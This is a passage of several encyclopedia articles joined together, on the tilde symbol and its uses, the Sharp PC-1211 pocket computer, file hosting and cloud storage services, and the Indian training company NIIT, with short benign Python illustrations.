called or , and is not considered an accent mark in Spanish, but rather simply a part of the letter (much like the dot over makes an character that is familiar to readers of English). Usage Common use in English The English language does not use the tilde as a diacritic. The standalone form of the symbol is used more widely. Informally, it means "approximately", "about", or "around", such as "~30 minutes before", meaning "approximately 30 minutes before". It can mean "similar to", including "of the same order of magnitude as", such as "" meaning that and are of the same order of magnitude. Another approximation symbol is the double tilde , meaning "approximately equal to". The tilde is also used to indicate congruence of shapes by placing it over an symbol, thus . In Japanese it is used in to indicate a range or interval: 5〜10 means between 5 and 10. In the computing field, especially in Unix-based systems, the tilde indicates the user's home directory. 
In more recent digital usage, tildes on either side of a word or phrase have sometimes come to convey a particular tone that "let[s] the enclosed words perform both sincerity and irony", which can pre-emptively defuse a negative reaction. For example, BuzzFeed journalist Joseph Bernstein interprets the tildes in the following tweet: "in the ~ spirit of the season ~ will now link to some of the (imho) #Bestof2014 sports reads. if you hate nice things, mute that hashtag." as a way of making it clear that both the author and reader are aware that the enclosed phrase – "spirit of the season" – "is cliche and we know this quality is beneath our author, and we don't want you to think our author is a cliche person generally". Diacritical use In some languages, the tilde is a diacritic mark placed over a letter to indicate a change in its pronunciation: Pitch The tilde was firstly used in the polytonic orthography of Ancient Greek, as a variant of the circumflex, representing a rise in pitch followed by a return to standard pitch. Abbreviation Later, it was used to make abbreviations in medieval Latin documents. When an or followed a vowel, it was often omitted, and a tilde (physically, a small ) was placed over the preceding vowel to indicate the missing letter; this is the origin of the use of tilde to indicate nasalization (compare the development of the umlaut as an abbreviation of .) The practice of using the tilde over a vowel to indicate omission of an or continued in printed books in French as a means of reducing text length until the 17th century. It was also used in Portuguese, and Spanish. The tilde was also used occasionally to make other abbreviations, such as over the letter , making , to signify the word que ("that"). Nasalization It is also as a small that the tilde originated when written above other letters, marking a Latin which had been elided in old Galician-Portuguese. In modern Portuguese it indicates nasalization of the base vowel: "hand", from Lat. manu-; "reasons", from Lat. . This usage has been adopted in the orthographies of several native languages of South America, such as Guarani and Nheengatu, as well as in the International Phonetic Alphabet (IPA) and many other phonetic alphabets. For example, is the IPA transcription of the pronunciation of the French place-name Lyon. In Breton, the symbol after a vowel means that the letter serves only to give the vowel a nasalised pronunciation, without being itself pronounced, as it normally is. For example, gives the pronunciation whereas gives . In the DMG romanization of Tunisian Arabic, the tilde is used for nasal vowels õ and ṏ. Palatal n The tilded (, ) developed from the digraph in Spanish. In this language, is considered a separate letter called eñe (), rather than a letter-diacritic combination; it is placed in Spanish dictionaries between the letters and . In Spanish, the word tilde actually refers to diacritics in general, e.g. the acute accent in José, while the diacritic in is called "virgulilla" (). Current languages in which the tilded () is used for the palatal nasal consonant include Asturian Aymara Basque Chamorro Filipino Galician Guaraní Iñupiaq Mapudungun Papiamento Quechua Spanish Tetum Wolof Tone In Vietnamese, a tilde over a vowel represents a creaky rising tone (ngã). Letters with the tilde are not considered separate letters of the Vietnamese alphabet. 
International Phonetic Alphabet In phonetics, a tilde is used as a diacritic that is placed above a letter, below it or superimposed onto the middle of it: A tilde above a letter indicates nasalization, e.g. . A tilde superimposed onto the middle of a letter indicates velarization or pharyngealization, e.g. . If no precomposed Unicode character exists, the Unicode character can be used to generate one. A tilde below a letter indicates laryngealisation, e.g. . If no precomposed Unicode character exists, the Unicode character can be used to generate one. Letter extension In Estonian, the symbol stands for the close-mid back unrounded vowel, and it is considered an independent letter. Other uses Some languages and alphabets use the tilde for other purposes: Arabic script: A symbol resembling the tilde () is used over the letter () to become , denoting a long sound. Guaraní: The tilded (note that with tilde is not available as a precomposed glyph in Unicode) stands for the velar nasal consonant. Also, the tilded () stands for the nasalized upper central rounded vowel . Munduruku, Parintintín, and two older spellings of Filipino words also use . Syriac script: A tilde (~) under the letter Kaph represents a sound, transliterated as ch or č. Estonian and Võro use the tilde above the letter o (õ) to indicate the vowel , a rare sound among languages. Unicode has a combining vertical tilde character: . It is used to indicate middle tone in linguistic transcription of certain dialects of the Lithuanian language. Punctuation The tilde is used in various ways in punctuation: Range In some languages (though not generally in English), a tilde-like wavy dash may be used as punctuation (instead of an unspaced hyphen, en dash or em dash) between two numbers, to indicate a range rather than subtraction or a hyphenated number (such as a part number or model number). For example, "12~15" means "12 to 15", "~3" means "up to three", and "100~" means "100 and greater". East Asian languages almost always use this convention, but it is often done for clarity in some other languages as well. Chinese uses the wavy dash and full-width em dash interchangeably for this purpose. In English, the tilde is often used to express ranges and model numbers in electronics, but rarely in formal grammar or in type-set documents, as a wavy dash preceding a number sometimes represents an approximation (see below). Approximation Before a number the tilde can mean 'approximately'; '~42' means 'approximately 42'. When used with currency symbols that precede the number (national conventions differ), the tilde precedes the symbol, thus for example '~$10' means 'about ten dollars'. The symbols ≈ (almost equal to) and ≅ (approximately equal to) are among the other symbols used to express approximation. Japanese The is used for various purposes in Japanese, including to denote ranges of numbers, in place of dashes or brackets, and to indicate origin. The wave dash is also used to separate a title and a subtitle in the same line, as a colon is used in English. When used in conversations via email or instant messenger it may be used as a sarcasm mark. The sign is used as a replacement for the , katakana character, in Japanese, extending the final syllable. 
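The encoding of the Japanese wave dash itself has a complicated history, described in the next subsection. Assuming Python's standard codecs, the divergence between the JIS mapping and Microsoft's code page 932 mapping of the same byte sequence can be observed directly; the snippet is an illustration only, not drawn from any cited source.

    # The two-byte Shift JIS sequence 0x81 0x60 is the wave dash.
    raw = b"\x81\x60"

    print(hex(ord(raw.decode("shift_jis"))))  # 0x301c  WAVE DASH (JIS mapping)
    print(hex(ord(raw.decode("cp932"))))      # 0xff5e  FULLWIDTH TILDE (Windows mapping)

    # Round-tripping U+301C through cp932 therefore fails:
    try:
        "\u301c".encode("cp932")
    except UnicodeEncodeError:
        print("U+301C has no cp932 encoding")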
Unicode and Shift JIS encoding of wave dash In practice the (Unicode ), is often used instead of the (Unicode ), because the Shift JIS code for the wave dash, 0x8160, which should be mapped to U+301C, is instead mapped to U+FF5E in Windows code page 932 (Microsoft's code page for Japanese), a widely used extension of Shift JIS. This decision avoided a shape definition error in the original (6.2) Unicode code charts: the wave dash reference glyph in JIS / Shift JIS matches the Unicode reference glyph for U+FF5E , while the original reference glyph for U+301C was reflected, incorrectly, when Unicode imported the JIS wave dash. In other platforms such as the classic Mac OS and macOS, 0x8160 is correctly mapped to U+301C. It is generally difficult, if not impossible, for users of Japanese Windows to type U+301C, especially in legacy, non-Unicode applications. A similar situation exists regarding the Korean KS X 1001 character set, in which Microsoft maps the EUC-KR or UHC code for the wave dash (0xA1AD) to , while IBM and Apple map it to U+301C. Microsoft also uses U+FF5E to map the KS X 1001 raised tilde (0xA2A6), while Apple uses . The current Unicode reference glyph for U+301C has been corrected to match the JIS standard in response to a 2014 proposal, which noted that while the existing Unicode reference glyph had been matched by fonts from the discontinued Windows XP, all other major platforms including later versions of Microsoft Windows shipped with fonts matching the JIS reference glyph for U+301C. The JIS / Shift JIS wave dash is still formally mapped to U+301C as of JIS X 0213, whereas the WHATWG Encoding Standard used by HTML5 follows Microsoft in mapping 0x8160 to U+FF5E. These two code points have a similar or identical glyph in several fonts, reducing the confusion and incompatibility. Mathematics As a unary operator A tilde in front of a single quantity can mean "approximately", "about" or "of the same order of magnitude as." In written mathematical logic, the tilde represents negation: "~p" means "not p", where "p" is a proposition. Modern use often replaces the tilde with the negation symbol (¬) for this purpose, to avoid confusion with equivalence relations. As a relational operator In mathematics, the tilde operator (Unicode U+223C), sometimes called "twiddle", is often used to denote an equivalence relation between two objects. Thus "" means " is equivalent to ". It is a weaker statement than stating that equals . The expression "" is sometimes read aloud as " twiddles ", perhaps as an analogue to the verbal expression of "". The tilde can indicate approximate equality in a variety of ways. It can be used to denote the asymptotic equality of two functions. For example, means that . A tilde is also used to indicate "approximately equal to" (e.g. 1.902 ~= 2). This usage probably developed as a typed alternative to the libra symbol used for the same purpose in written mathematics, which is an equal sign with the upper bar replaced by a bar with an upward hump, bump, or loop in the middle (︍︍♎︎) or, sometimes, a tilde (≃). The symbol "≈" is also used for this purpose. In physics and astronomy, a tilde can be used between two expressions (e.g. ) to state that the two are of the same order of magnitude. In statistics and probability theory, the tilde means "is distributed as"; see random variable(e.g. X ~ B(n,p) for a binomial distribution). A tilde can also be used to represent geometric similarity (e.g. , meaning triangle is similar to ). 
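As a small illustration of the "is distributed as" notation mentioned above, the statement X ~ B(n, p) corresponds to drawing values of X from a binomial distribution. A minimal sketch using only Python's standard library (the parameters are arbitrary examples):

    import random

    def sample_binomial(n: int, p: float) -> int:
        # One draw of X ~ B(n, p): count successes in n independent trials.
        return sum(random.random() < p for _ in range(n))

    draws = [sample_binomial(n=10, p=0.3) for _ in range(5)]
    print(draws)        # five independent realisations of X
    print(10 * 0.3)     # the expected value E[X] = n*p = 3.0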
A triple tilde (≋) is often used to show congruence, an equivalence relation in geometry. As an accent The symbol "" is pronounced as "eff tilde" or, informally, as "eff twiddle" or, in American English, "eff wiggle". This can be used to denote the Fourier transform of f, or a lift of f, and can have a variety of other meanings depending on the context. A tilde placed below a letter in mathematics can represent a vector quantity (e.g. ). In statistics and probability theory, a tilde placed on top of a variable is sometimes used to represent the median of that variable; thus would indicate the median of the variable . A tilde over the letter n () is sometimes used to indicate the harmonic mean. In machine learning, a tilde may represent a candidate value for a cell state in GRUs or LSTM units. (e.g. c̃) Physics Often in physics, one can consider an equilibrium solution to an equation, and then a perturbation to that equilibrium. For the variables in the original equation (for instance ) a substitution can be made, where is the equilibrium part and is the perturbed part. A tilde is also used in particle physics to denote the hypothetical supersymmetric partner. For example, an electron is referred to by the letter e, and its superpartner the selectron is written ẽ. Economics For relations involving preference, economists sometimes use the tilde to represent indifference between two or more bundles of goods. For example, to say that a consumer is indifferent between bundles x and y, an economist would write x ~ y. Electronics It can approximate the sine wave symbol (∿, U+223F), which is used in electronics to indicate alternating current, in place of +, −, or ⎓ for direct current. Linguistics The tilde may indicate alternating allomorphs or morphological alternation, as in for kneel~knelt (the plus sign '+' indicates a morpheme boundary). The tilde may represent some sort of phonetic or phonemic variation between two sounds, which might be allophones or in free variation. For example, can represent "either or ". In formal semantics, it is also used as a notation for the squiggle operator which plays a key role in many theories of focus. Computing Computer programmers use the tilde in various ways and sometimes call the symbol (as opposed to the diacritic) a squiggle, squiggly, swiggle, or twiddle. According to the Jargon File, other synonyms sometimes used in programming include not, approx, wiggle, enyay (after eñe) and (humorously) sqiggle . Directories and URLs On Unix-like operating systems (including AIX, BSD, Linux and macOS), tilde normally indicates the current user's home directory. For example, if the current user's home directory is , then the command is equivalent to , , or . This convention derives from the Lear-Siegler ADM-3A terminal in common use during the 1970s, which happened to have the tilde symbol and the word "Home" (for moving the cursor to the upper left) on the same key. When prepended to a particular username, the tilde indicates that user's home directory (e.g., for the home directory of user , such as ). Used in URLs on the World Wide Web, it often denotes a personal website on a Unix-based server. For example, might be the personal website of John Doe. This mimics the Unix shell usage of the tilde. However, when accessed from the web, file access is usually directed to a subdirectory in the user's home directory, such as or . In URLs, the characters (or ) may substitute for a tilde if an input device lacks a tilde key. Thus, and will behave in the same manner. 
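The home-directory shorthand described above is usually expanded by the shell, but most languages expose the same convention; a brief sketch in Python (the user names shown in the comments are only examples):

    import os.path

    print(os.path.expanduser("~"))              # e.g. /home/johndoe
    print(os.path.expanduser("~/projects"))     # e.g. /home/johndoe/projects
    print(os.path.expanduser("~root"))          # home directory of user "root", e.g. /root
    print(os.path.expanduser("no/tilde/here"))  # returned unchanged: no leading tilde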
Computer languages The tilde is used in the AWK programming language as part of the pattern match operators for regular expressions: variable ~ /regex/ returns true if the variable is matched. variable !~ /regex/ returns false if the variable is matched. A variant of this, with the plain tilde replaced with =~, was adopted in Perl, and this semi-standardization has led to the use of these operators in other programming languages, such as Ruby or the SQL variant of the database PostgreSQL. In APL and MATLAB, the tilde represents the monadic logical function NOT, and in APL it additionally represents the dyadic multiset function without (set difference). In C the tilde character is used as the bitwise NOT unary operator, following the notation in logic (whereas ! performs a logical NOT). This is also used by most languages based on or influenced by C, such as C++, D and C#. The MySQL database also uses the tilde as bitwise invert, as does Microsoft's SQL Server Transact-SQL (T-SQL) language. JavaScript also uses the tilde as bitwise NOT; because JavaScript internally uses floats and the bitwise complement only works on integers, numbers are stripped of their decimal part before the operation is applied. This has also given rise to using two tildes ~~x as a short syntax for a cast to integer (numbers are stripped of their decimal part and changed into their complement, and then back). In C++ and C#, the tilde is also used as the first character in a class's method name (where the rest of the name must be the same name as the class) to indicate a destructor – a special method which is called at the end of the object's life. In ASP.NET applications, the tilde ('~') is used as a shortcut to the root of the application's virtual directory. In the CSS stylesheet language, the tilde is used for the indirect adjacent combinator as part of a selector. In the D programming language, the tilde is used as an array concatenation operator, as well as to indicate an object destructor and the bitwise not operator. The tilde operator can be overloaded for user-defined types, and the binary tilde operator is mostly used for merging two objects or appending an object to a set of objects. It was introduced because the plus operator can have different meanings in many situations. For example, what should "120" + "14" produce? Is it the string "134" (addition of two numbers), "12014" (concatenation of strings) or something else? D disallows the + operator for arrays (and strings) and provides a separate operator for concatenation (the PHP programming language solved this problem similarly, by using the dot operator for concatenation and + for number addition, which will also work on strings containing numbers). In Eiffel, the tilde is used for object comparison. If a and b denote objects, the boolean expression a ~ b has value true if and only if these objects are equal, as defined by the applicable version of the library routine is_equal, which by default denotes field-by-field object equality but can be redefined in any class to support a specific notion of equality. If a and b are references, the object equality expression a ~ b is to be contrasted with a = b which denotes reference equality. Unlike the call a.is_equal (b), the expression a ~ b is type-safe even in the presence of covariance. In the Apache Groovy programming language the tilde character is used as an operator mapped to the bitwiseNegate() method. Given a String the method will produce a java.util.regex.Pattern. Given an integer it will negate the integer bitwise like in C. 
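Python follows the same conventions for two of the roles described above: ~ is its bitwise NOT operator (so ~x equals -x - 1 on two's-complement integers), and the pattern-matching role that ~ and =~ play in AWK and Perl is filled by the re module rather than by an operator. A minimal sketch (the strings and patterns are arbitrary examples):

    import re

    x = 5
    print(~x)            # -6, since ~x == -x - 1 for Python integers
    print(~x == -x - 1)  # True

    # Rough analogue of AWK's  variable ~ /regex/  test:
    variable = "tilde ~ example"
    print(bool(re.search(r"~", variable)))      # True: the pattern matches
    print(bool(re.search(r"\d+$", variable)))   # False: no trailing digits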
=~ and ==~ can in Groovy be used to match a regular expression. In Haskell, the tilde is used in type constraints to indicate type equality. Also, in pattern-matching, the tilde is used to indicate a lazy pattern match. In the Inform programming language, the tilde is used to indicate a quotation mark inside a quoted string. In "text mode" of the LaTeX typesetting language a tilde diacritic can be obtained using, e.g., \~{n}, yielding "ñ". A stand-alone tilde can be obtained by using \textasciitilde or \string~. In "math mode" a tilde diacritic can be written as, e.g., \tilde{x}. For a wider tilde \widetilde can be used. The \sim command produce a tilde-like binary relation symbol that is often used in mathematical expressions, and the double-tilde ≈ is obtained with \approx. The url package also supports entering tildes directly, e.g., \url{http://server/~name}. In both text and math mode, a tilde on its own (~) renders a white space with no line breaking. In MediaWiki syntax, four tildes are used as a shortcut for a user's signature. In Common Lisp, the tilde is used as the prefix for format specifiers in format strings. In Max/MSP, a tilde is used to denote objects that process at the computer's sampling rate, i.e. mainly those that deal with sound. In Standard ML, the tilde is used as the prefix for negative numbers and as the unary negation operator. In OCaml, the tilde is used to specify the label for a labeled parameter. In R, the tilde operator is used to separate the left- and right-hand sides in a model formula. In Object REXX, the twiddle is used as a "message send" symbol. For example, Employee.name~lower() would cause the lower() method to act on the object Employee's name attribute, returning the result of the operation. ~~ returns the object that received the method rather than the result produced. Thus it can be used when the result need not be returned or when cascading methods are to be used. team~~insert("Jane")~~insert("Joe")~~insert("Steve") would send multiple concurrent insert messages, thus invoking the insert method three consecutive times on the team object. In Raku, is used instead of for a regular expression. Backup filenames The dominant Unix convention for naming backup copies of files is appending a tilde to the original file name. It originated with the Emacs text editor and was adopted by many other editors and some command-line tools. Emacs also introduced an elaborate numbered backup scheme, with files named , and so on. It didn't catch on, as the rise of version control software eliminates the need for this usage. Microsoft filenames The tilde was part of Microsoft's filename mangling scheme when it extended the FAT file system standard to support long filenames for Microsoft Windows. Programs written prior to this development could only access filenames in the so-called 8.3 format—the filenames consisted of a maximum of eight characters from a restricted character set (e.g. no spaces), followed by a period, followed by three more characters. In order to permit these legacy programs to access files in the FAT file system, each file had to be given two names—one long, more descriptive one, and one that conformed to the 8.3 format. This was accomplished with a name-mangling scheme in which the first six characters of the filename are followed by a tilde and a digit. For example, "" might become "". The tilde symbol is also often used to prefix hidden temporary files that are created when a document is opened in Windows. 
For example, when a document "Document1.doc" is opened in Word, a file called "~$cument1.doc" is created in the same directory. This file contains information about which user has the file open, to prevent multiple users from attempting to change a document at the same time. Juggling notation In the juggling notation system Beatmap, tilde can be added to either "hand" in a pair of fields to say "cross the arms with this hand on top". Mills Mess is thus represented as (~2x,1)(1,2x)(2x,~1)*. Unicode The following letters exist that use the tilde as a diacritic as precomposed or combining Unicode characters: Unicode has code-points for many forms of non-combined tilde, for symbols incorporating tildes, and for characters visually similar to a tilde: ASCII tilde (U+007E) Most modern fonts align the plain ASCII spacing tilde at the same level as dashes, or only slightly upper. This makes it useless for the tilde's original purpose on typewriters, which was to overprint above a character as a diacritic, but does make modern use as an operator easier to read. Some monospace fonts do raise the tilde. On older printers which could overprint the tilde was often raised to allow it's use as a diacritic. An always-raised small tilde  was introduced with Windows-1252 to allow reproduction of older text appearance. Keyboards Where a tilde is on the keyboard depends on the computer's language settings according to the following chart. On many keyboards it is primarily available through a dead key that makes it possible to produce a variety of precomposed characters with the diacritic. In that case, a single tilde can typically be inserted with the dead key followed by the space bar, or alternatively by striking the dead key twice in a row. To insert a tilde with the dead key, it is often necessary to simultaneously hold down the Alt Gr key. With a Macintosh either of the Alt/Option keys function similarly. In the US and European Windows systems, the Alt code for a single tilde is 126. See also Circumflex Tittle Double tilde (disambiguation) Notes References Latin-script diacritics Punctuation Typographical symbols Greek-script diacritics Logic symbols Mathematical symbols
1050544
https://en.wikipedia.org/wiki/Sharp%20PC-1211
Sharp PC-1211
The Sharp PC-1211 is a pocket computer marketed by Sharp Corporation in the 1980s. The computer was powered by two 4-bit CPUs laid out in power-saving CMOS circuitry. One acted as the main CPU, the other dealt with the input/output and display interface. Users could write computer programs in BASIC. A badge-engineered version of the PC-1211 was marketed by Radio Shack as the first iteration of the TRS-80 Pocket Computer. Technical specifications 24 digit dot matrix LCD Full QWERTY-style keyboard Integrated beeper Connector for printer and tape drive Programmable in BASIC Uses four MR44 1.35 V Mercury button cells Battery life in excess of 200 hours 1424 program steps, 26 permanent variable locations (A-Z or A$-Z$) and 178 variables shared with program steps Built out of off-the-shelf CMOS components, including SC43177/SC43178 processors at 256 kHz and three TC5514P 4 Kbit RAM modules Accessories CE-121 Cassette Interface CE-122 Printer TRS-80 Pocket Computer ("PC-1") A badge-engineered version of the Sharp PC-1211 was marketed by Radio Shack as the original TRS-80 Pocket Computer. (This was later referred to as the "PC-1" to differentiate it from subsequent entries (PC-2 onwards) in the TRS-80 Pocket Computer line.) Introduced in July 1980, the "PC-1" measured 175 × 70 × 15 mm and weighed 170 g, and had a one-line, 24-character alphanumeric LCD. The TRS-80 Pocket Computer was programmable in BASIC, with a capacity of 1424 "program steps". This memory was shared with variable storage of up to 178 locations, in addition to the 26 fixed locations named A through Z. The implementation was based on Palo Alto Tiny BASIC. Programs and data could be stored on a Compact Cassette through an optional external cassette tape interface unit. A printer/cassette interface was available, which used an ink ribbon on plain paper. See also Sharp pocket computer character sets References External links Sharp PC-1211 on MyCalcDB (database about 1970s and 1980s pocket calculators) www.promsoft.com/calcs Sharp Pocket Computers Daves Old Computers - TRS-80 Pocket Computer The TRS-80 Pocket Computer PC-1211 PC-1211 Computer-related introductions in 1980
1693035
https://en.wikipedia.org/wiki/File%20hosting%20service
File hosting service
A file hosting service, cloud storage service, online file storage provider, or cyberlocker is an internet hosting service specifically designed to host user files. It allows users to upload files that could be accessed over the internet after a user name and password or other authentication is provided. Typically, the services allow HTTP access, and sometimes FTP access. Related services are content-displaying hosting services (i.e. video and image), virtual storage, and remote backup. Uses Personal file storage Personal file storage services are aimed at private individuals, offering a sort of "network storage" for personal backup, file access, or file distribution. Users can upload their files and share them publicly or keep them password-protected. Document-sharing services allow users to share and collaborate on document files. These services originally targeted files such as PDFs, word processor documents, and spreadsheets. However many remote file storage services are now aimed at allowing users to share and synchronize all types of files across all the devices they use. File sync and sharing services File syncing and sharing services are file hosting services which allow users to create special folders on each of their computers or mobile devices, which the service then synchronizes so that it appears to be the same folder regardless of which computer is used to view it. Files placed in this folder also are typically accessible through a website and mobile apps, and can be easily shared with other users for viewing or collaboration. Such services have become popular via consumer products such as Dropbox and Google Drive. Content caching Content providers who potentially encounter bandwidth congestion issues may use services specialized in distributing cached or static content. It is the case for companies with a major Internet presence. Storage charges Some online file storage services offer space on a per-gigabyte basis, and sometimes include a bandwidth cost component as well. Usually these will be charged monthly or yearly. Some companies offer the service for free, relying on advertising revenue. Some hosting services do not place any limit on how much space the user's account can consume. Some services require a software download which makes files only available on computers which have that software installed, others allow users to retrieve files through any web browser. With the increased inbox space offered by webmail services, many users have started using their webmail service as an online drive. Some sites offer free unlimited file storage but have a limit on the file size. Some sites offer additional online storage capacity in exchange for new customer referrals. One-click hosting One-click hosting, sometimes referred to as cyberlocker, generally describes web services that allow internet users to easily upload one or more files from their hard drives (or from a remote location) onto the one-click host's server free of charge. Most such services simply return a URL which can be given to other people, who can then fetch the file later. In many cases these URLs are predictable allowing potential misuse of the service. these sites have drastically increased in popularity, and subsequently, many of the smaller, less efficient sites have failed. Although one-click hosting can be used for many purposes, this type of file sharing has, to a degree, come to compete with P2P filesharing services. 
The sites make money through advertising or charging for premium services such as increased downloading capacity, removing any wait restrictions the site may have or prolonging how long uploaded files remain on the site. Premium services include facilities like unlimited downloading, no waiting, maximum download speed, etc. Many such sites implement a CAPTCHA to prevent automated downloading. Several programs aid in downloading files from these one-click hosts; examples are JDownloader, FreeRapid, Mipony, Tucan Manager and CryptLoad. Use for copyright infringement File hosting services may be used as a means to distribute or share files without consent of the copyright owner. In such cases one individual uploads a file to a file hosting service, which others can then download. Legal assessments can be very diverse. For example, in the case of Swiss-German file hosting service RapidShare, in 2010 the US government's congressional international anti-piracy caucus declared the site a "notorious illegal site", claiming that the site was "overwhelmingly used for the global exchange of illegal movies, music and other copyrighted works". But in the legal case Atari Europe S.A.S.U. v. Rapidshare AG in Germany, the Düsseldorf higher regional court examined claims related to alleged infringing activity and reached the conclusion on appeal that "most people utilize RapidShare for legal use cases" and that to assume otherwise was equivalent to inviting "a general suspicion against shared hosting services and their users which is not justified". The court also observed that the site removes copyrighted material when asked and does not provide search facilities for illegal material, noted previous cases siding with RapidShare, and after analysis concluded that the plaintiff's proposals for more strictly preventing sharing of copyrighted material – submitted as examples of anti-piracy measures RapidShare might have adopted – were "unreasonable or pointless". By contrast, in January 2012 the United States Department of Justice seized and shut down the file hosting site Megaupload.com and commenced criminal cases against its owners and others. The indictment argued that Megaupload differed from other online file storage businesses, citing a number of design features of its operating model as evidence of a criminal intent and venture. Examples cited included reliance upon advertising revenue and other activities showing the business was funded by (and heavily promoted) downloads and not storage, defendants' communications helping users who sought infringing material, and defendants' communications discussing their own evasion and infringement issues. the case has not yet been heard. A year later, Megaupload.com relaunched as Mega. In 2016 the file hosting site Putlocker was noted by the Motion Picture Association of America as a major piracy threat, and in 2012 Alfred Perry of Paramount Pictures listed Putlocker as one of the "top 5 rogue cyberlocker services", alongside Wupload, FileServe, Depositfiles, and MediaFire. Security The emergence of cloud storage services has prompted much discussion on security. Security, as it relates to cloud storage, can be broken down into: Access and integrity security Deals with the questions of confidentiality and availability: Will the user be able to continue accessing their data? Who else can access it? Who can change it? 
Whether the user is able to continue accessing their data depends on a large number of factors, ranging from the location and quality of their internet connection and the physical integrity of the provider's data center to the financial stability of the storage provider. The question of who can access and, potentially, change their data ranges from what physical access controls are in place in the provider's data center to what technical steps have been taken, such as access control, encryption, etc.

Many cloud storage services state that they either encrypt data before it is uploaded or while it is stored. While encryption is generally regarded as best practice in cloud storage, how the encryption is implemented is very important. Consumer-grade, public file hosting and synchronization services are popular, but for business use, they create the concern that corporate information is exported to devices and cloud services that are not controlled by the organization.

Some cloud storage providers offer granular ACLs for application keys. One important permission is append-only, which is distinct from simple "read", "write", and "read-write" permissions in that all existing data is immutable. Append-only support is especially important for mitigating the risk of data loss in backup policies, in the event that the computer being backed up becomes infected with ransomware capable of deleting or encrypting the victim's backups.

Data encryption
Secret key encryption is sometimes referred to as zero knowledge, meaning that only the user has the encryption key needed to decrypt the data. Since data is encrypted using the secret key, identical files encrypted with different keys will be different. To be truly zero knowledge, the file hosting service must not be able to store the user's passwords or see their data even with physical access to the servers. For this reason, secret key encryption is considered the highest level of access security in cloud storage. This form of encryption is rapidly gaining popularity, with companies such as MEGA (previously Megaupload) and SpiderOak offering entirely zero-knowledge file storage and sharing. Since secret key encryption results in unique files, it makes data deduplication impossible and therefore may use more storage space.

Convergent encryption derives the key from the file content itself, meaning that identical files encrypted on different computers result in identical encrypted files. This enables the cloud storage provider to de-duplicate data blocks, meaning only one instance of a unique file (such as a document, photo, music or movie file) is actually stored on the cloud servers but made accessible to all uploaders. A third party who gained access to the encrypted files could thus easily determine whether a user has uploaded a particular file simply by encrypting it themselves and comparing the outputs. Some point out that there is a theoretical possibility that organizations such as the RIAA, MPAA, or a government could obtain a warrant for US law enforcement to access the cloud storage provider's servers and gain access to the encrypted files belonging to a user. Demonstrating to a court that applying the convergent encryption methodology to an unencrypted copyrighted file produces the same encrypted file as the one possessed by the user would appear to make a strong case that the user is guilty of possessing the file in question, thus providing evidence of copyright infringement by the user.
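The deduplication and file-matching properties described above follow directly from how the key is derived. The following is a minimal Python sketch of convergent encryption, not any particular provider's actual scheme: the keystream construction is chosen only for brevity and is not production-grade cryptography, and all function names are illustrative.

import hashlib

def convergent_key(plaintext: bytes) -> bytes:
    # The key is derived from the content itself, so identical files yield identical keys.
    return hashlib.sha256(plaintext).digest()

def keystream(key: bytes, length: int) -> bytes:
    # Deterministic keystream built from repeated hashing (illustrative only).
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])

def convergent_encrypt(plaintext: bytes) -> bytes:
    key = convergent_key(plaintext)
    return bytes(p ^ k for p, k in zip(plaintext, keystream(key, len(plaintext))))

# Two users encrypt the same file independently and produce identical ciphertexts,
# which is what lets the provider deduplicate storage...
assert convergent_encrypt(b"identical content") == convergent_encrypt(b"identical content")
# ...and what lets anyone holding a plaintext copy confirm, by encrypting it themselves
# and comparing, that a given stored ciphertext corresponds to that file.

In a deployed system the per-file key would itself be stored wrapped under a secret known only to the user, and an authenticated cipher would be used; the point of the sketch is only that the ciphertext is a deterministic function of the content, in contrast to the secret-key (zero-knowledge) approach described earlier.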
There is, however, no easily accessible public record of such a demonstration having been tried in court as of May 2013, and an argument could be made that, similar to the opinion expressed by Attorney Rick G. Sanders of Aaron | Sanders PLLC in regards to the iTunes Match "Honeypot" discussion, a warrant to search the cloud storage provider's servers would be hard to obtain without other, independent, evidence establishing probable cause for copyright infringement. Such legal restraint would obviously not apply to the secret police of an oppressive government, who could potentially gain access to the encrypted files through various forms of hacking or other cybercrime.

Ownership security

See also
Comparison of file hosting services
Comparison of file synchronization software
Comparison of online backup services
Comparison of online music lockers
File sharing
List of backup software
Shared disk access

References

File hosting
Records management
21554169
https://en.wikipedia.org/wiki/NIIT
NIIT
NIIT Limited is an Indian multinational skills and talent development corporation headquartered in Gurgaon, India. The company was set up in 1981 to help the nascent IT industry overcome its human resource challenges. NIIT offers training and development to individuals, enterprises and institutions. History NIIT was established in 1981 by Rajendra S. Pawar and Vijay K. Thadani, graduates from IIT Delhi, with one million rupees. NIIT conceived a franchising model in IT education for the very first time, setting up nine centers by 1987. In 1986, NIIT began its foray into the software domain, beginning with Software Product Distribution under the 'Insoft' brand. The company also began offering advice and consultancy to large corporations on how to leverage technology and make optimum use of their IT investments. In 1988, NIIT introduced many marketing and advertising strategies for the Indian market including the 'Computerdrome' in 1990. Another initiative launched by NIIT, was its Bhavishya Jyoti Scholarships program, launched in 1991, which was targeted at deserving and socially challenged students with an aim to improve their skills and employability quotient. In 1992, NIIT launched its flagship program GNIIT, an industry-endorsed course with a 12-month Professional Practice for students seeking careers in the IT and non-IT sectors. By 1993, the NIIT stock began trading on Indian stock exchanges. In 1996, NIIT began its globalization journey, setting up an education center in Hong Kong. In the same year, the company launched its virtual university 'NetVarsity'. In 1998, NIIT joined a handful of Indian tech companies to enter the Chinese market. The company earned the epithet, the 'McDonald's of the software business' by Far Eastern Economic Review in September, 2001. The same year, NIIT launched an experiment that was christened 'Hole-in-the-Wall' by media and drew international attention. The experiment was based on the ‘minimally invasive education’ methodology developed by NIIT R&D. It suggested that children, irrespective of their social, ethnic, or educational identity could learn to use computers by themselves, without adult intervention. In 2003, NIIT launched its MindChampions Academy (MCA) with Viswanathan Anand, five-time former World Chess champion and NIIT Brand Ambassador. In 2004, NIIT sectioned off its software business into an independent organization called NIIT Technologies Ltd. (Source: NASSCOM's 2013–14 Ranking of Top 20 IT services companies). In the area of training, NIIT launched its 'Edgeineers' program in 2005, to boost career opportunities for engineering graduates. In 2006, it diversified into various new sectors for training, such as banking, finance and insurance (through IFBI), executive management education (through NIIT Imperia brand), Professional Life Skills training and business process management training (through Evolv and NIIT Uniqua). In 2009, NIIT University (NU), a not-for-profit University was established, under section 2(f) of UGC Act and notified by the Government of Rajasthan. In 2014, NIIT tied up with National Skill Development Corporation to launch NIIT Yuva Jyoti centers, under the pilot phase of Prime Minister Narendra Modi's Skill India campaign and the Pradhan Mantri Kaushal Vikas Yojana (PMKVY) in North East, J&K and Jharkhand. In May 2019, Baring Private Equity Asia had acquired controlling stake of NIIT Ltd in 